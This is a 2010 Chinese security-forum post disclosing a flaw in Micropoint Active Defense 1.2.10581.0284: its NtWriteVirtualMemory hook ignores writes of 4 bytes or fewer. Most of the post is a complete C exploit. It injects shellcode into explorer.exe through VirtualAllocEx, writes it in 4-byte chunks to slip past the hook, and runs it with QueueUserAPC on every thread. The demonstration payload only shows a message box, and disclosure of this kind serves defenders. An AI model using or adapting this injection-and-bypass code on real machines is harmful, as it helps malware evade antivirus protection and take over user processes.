-
-
[原创]微点主动防御1.2.10581.0284绕过安全限制漏洞
-
发表于:
2010-6-4 18:00
6468
-
[原创]微点主动防御1.2.10581.0284绕过安全限制漏洞
漏洞涉及产品:微点主动防御1.2.10581.0284版本,其他版本尚未关注。
漏洞影响:通过此漏洞可以让攻击者绕过微点对NtWriteVirtualMemory函数的监控,从而能写任意进程的ring3内存空间,为DLL注入等恶意行为铺路。
漏洞详细原理:微点主动防御软件为了有效防止恶意进程写其他进程的内存空间,inlinehook了系统函数NtWriteVirtualMemory。但在处理NtWriteVirtualMemory的第四个参数BufferSize时,未对BufferSize<=4的写入情况进行控制,导致此情景发生。
利用程序代码如下:
操作系统:win7,winXP
#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#define _WIN32_WINNT 0x0400
#define NO_WIN32_LEAN_AND_MEAN
typedef HANDLE (_stdcall *OPENTHREAD) (DWORD dwFlag, BOOL bUnknow, DWORD dwThreadId);
int main ()
{
int i;
BOOL bFlag;
BYTE * lpBuf;
THREADENTRY32 th32;
PROCESSENTRY32 procentry;
HANDLE hProcess, hSnapShot, hThread, hThreadSnap;
DWORD dwSize, dwWritten, dwProcessID, lpMessageBox;
HMODULE hDll;
OPENTHREAD lpfnOpenThread;
BYTE shellcode[] = "\x8b\xf6\x55\x8b\xec\x6a\x00\x6a\x00\x6a\x00\x6a\x00"
"\xE8"
"\x71\xea\xba\x75"
"\x5d\xC2\x04\x00\x90\x90";
dwSize = 4;
lpMessageBox = GetProcAddress(LoadLibrary("User32.dll"), "MessageBoxA");
lpfnOpenThread = (OPENTHREAD)GetProcAddress(LoadLibrary("kernel32.dll"), "OpenThread");
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
procentry.dwSize = sizeof(PROCESSENTRY32);
bFlag= Process32First(hSnapShot, &procentry);
while(bFlag)
{
if(stricmp(procentry.szExeFile, "explorer.exe")==0)
{
dwProcessID = procentry.th32ProcessID;
break;
}
bFlag=Process32Next(hSnapShot,&procentry);
}
printf("explore.exe pid:%d\n", dwProcessID);
hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessID );
lpBuf = VirtualAllocEx( hProcess, NULL, 24, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( NULL == lpBuf )
{
CloseHandle( hProcess );
return FALSE;
}
printf ("VirtualAllocEx : %x\n", lpBuf);
*(signed long *)(shellcode + 14) = lpMessageBox - (signed long)lpBuf - 18;
for (i = 0; i < 6; i++)
{
if( WriteProcessMemory( hProcess, lpBuf + i * 4, shellcode + i * 4, dwSize, &dwWritten ) )
{
if ( dwWritten != dwSize )
{
VirtualFreeEx( hProcess, lpBuf, 24, MEM_DECOMMIT );
CloseHandle( hProcess );
printf ("WriteProcessMemory Error!\n");
return FALSE;
}
}
}
hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, dwProcessID);
if (hThreadSnap == INVALID_HANDLE_VALUE)
{
CloseHandle( hProcess );
return FALSE;
}
th32.dwSize = sizeof(THREADENTRY32);
if (!Thread32First(hThreadSnap, &th32))
{
CloseHandle(hThreadSnap);
CloseHandle(hProcess);
return FALSE;
}
do
{
if (th32.th32OwnerProcessID == dwProcessID)
{
printf("ThreadID: %ld\n", th32.th32ThreadID); //显示找到的线程的ID
hThread = lpfnOpenThread(THREAD_ALL_ACCESS, FALSE, th32.th32ThreadID);
if (!QueueUserAPC(lpBuf, hThread, NULL))
{
printf ("QueueUserApc error %x\n", GetLastError());
}
}
}while(Thread32Next(hThreadSnap, &th32));
CloseHandle(hThreadSnap);
CloseHandle( hProcess );
return TRUE;
}
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
